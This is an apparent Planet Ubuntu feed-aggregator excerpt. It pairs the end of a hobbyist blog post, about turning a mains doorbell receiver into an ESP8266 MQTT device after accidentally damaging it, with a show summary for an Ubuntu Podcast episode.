(Full disclosure: When initially probing out the mains doorbell for active signals I did so while it was plugged into the mains. My ‘scope is not fully isolated it seems and at one point I managed to trip the breaker on the mains circuit and blow the ringer part of the doorbell. Ooops. I ended up ordering an identical replacement (avoiding the need to replace the bell-push) and subsequently was able to re-use the ‘broken’ device as the ESP8266 receiver - the receiving part was still working, just not making a noise. The new receiver ended up in the living room, so the doorbell still sounds normally.)

  1. I have a basic ESP8266 MQTT framework I’ve been using for a bunch of devices based off Tuan PM’s work. I’ll put it up at some point. 

Jonathan McDowell https://www.earth.li/~noodles/blog/ Noodles' Emptiness

Ubuntu Podcast from the UK LoCo: S11E33 – Thirty-Three Teeth

Planet Ubuntu - Enj, 25/10/2018 - 5:30md

This week we’ve been playing with DXVK and Volumio. We discuss Wifi getting a new naming scheme, interpreting the Linux CoC, Motorola partnering with iFixIt, KDE adding scaling for GTK applications and what’s been going on in the Ubuntu Community.

It’s Season 11 Episode 33 of the Ubuntu Podcast! Alan Pope, Mark Johnson and guest presenter Andy Jesse are connected and speaking to your brain.

In this week’s show:

That’s all for this week! You can listen to the Ubuntu Podcast back catalogue on YouTube. If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to show@ubuntupodcast.org or Tweet us or Comment on our Facebook page or comment on our Google+ page or comment on our sub-Reddit.

Faqet

Subscribe to AlbLinux agreguesi